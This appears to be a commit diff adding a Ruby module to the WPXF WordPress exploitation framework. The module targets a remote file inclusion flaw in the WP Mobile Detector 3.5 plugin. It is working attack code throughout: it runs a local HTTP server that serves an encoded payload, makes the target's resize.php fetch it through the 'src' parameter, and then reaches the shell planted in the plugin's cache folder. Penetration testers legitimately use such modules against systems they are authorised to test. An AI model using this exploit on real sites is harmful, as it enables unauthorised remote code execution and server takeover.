|
| 1 | +class Wpxf::Exploit::WpMobileDetectorRfiShellUpload < Wpxf::Module |
| 2 | + include Wpxf |
| 3 | + include Wpxf::Net::HttpServer |
| 4 | + include Wpxf::WordPress::ShellUpload |
| 5 | + |
| 6 | + def initialize |
| 7 | + super |
| 8 | + |
| 9 | + update_info( |
| 10 | + name: 'WP Mobile Detector RFI Shell Upload', |
| 11 | + desc: 'The WP Mobile Detector plugin, in version 3.5, '\ |
| 12 | + 'allows for remote file inclusion and remote code execution via '\ |
| 13 | + 'the resize.php script. This exploit only works when the PHP '\ |
| 14 | + 'option "allow_url_fopen" is enabled (disabled by default in most cases).', |
| 15 | + author: [ |
| 16 | + 'White Fir Design', # Vulnerability disclosure |
| 17 | + 'Rob Carr <rob[at]rastating.com>' # WPXF module |
| 18 | + ], |
| 19 | + references: [ |
| 20 | + ['URL', 'https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/'], |
| 21 | + ['WPVDB', '8505'] |
| 22 | + ], |
| 23 | + date: 'May 31 2016' |
| 24 | + ) |
| 25 | + |
| 26 | + register_options([ |
| 27 | + StringOption.new( |
| 28 | + name: 'rfi_host', |
| 29 | + desc: 'The external address of this machine', |
| 30 | + required: true |
| 31 | + ), |
| 32 | + StringOption.new( |
| 33 | + name: 'rfi_path', |
| 34 | + desc: 'The path to access via the remote file inclusion request', |
| 35 | + default: Utility::Text.rand_alpha(8), |
| 36 | + required: true |
| 37 | + ) |
| 38 | + ]) |
| 39 | + end |
| 40 | + |
| 41 | + def plugin_url |
| 42 | + normalize_uri(wordpress_url_plugins, 'wp-mobile-detector') |
| 43 | + end |
| 44 | + |
| 45 | + def check |
| 46 | + check_plugin_version_from_readme('wp-mobile-detector', '3.6', '3.5') |
| 47 | + end |
| 48 | + |
| 49 | + def rfi_host |
| 50 | + normalized_option_value('rfi_host') |
| 51 | + end |
| 52 | + |
| 53 | + def rfi_path |
| 54 | + normalized_option_value('rfi_path') |
| 55 | + end |
| 56 | + |
| 57 | + def rfi_url |
| 58 | + "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}/#{payload_name}" |
| 59 | + end |
| 60 | + |
| 61 | + def on_http_request(path, params, headers) |
| 62 | + payload.encoded |
| 63 | + end |
| 64 | + |
| 65 | + def uploader_url |
| 66 | + normalize_uri(plugin_url, 'resize.php') |
| 67 | + end |
| 68 | + |
| 69 | + def payload_body_builder |
| 70 | + builder = Utility::BodyBuilder.new |
| 71 | + builder.add_field('src', rfi_url) |
| 72 | + builder |
| 73 | + end |
| 74 | + |
| 75 | + def uploaded_payload_location |
| 76 | + normalize_uri(plugin_url, 'cache', payload_name) |
| 77 | + end |
| 78 | + |
| 79 | + def before_upload |
| 80 | + start_http_server(true) |
| 81 | + true |
| 82 | + end |
| 83 | + |
| 84 | + def cleanup |
| 85 | + stop_http_server |
| 86 | + super |
| 87 | + end |
| 88 | +end |
0 commit comments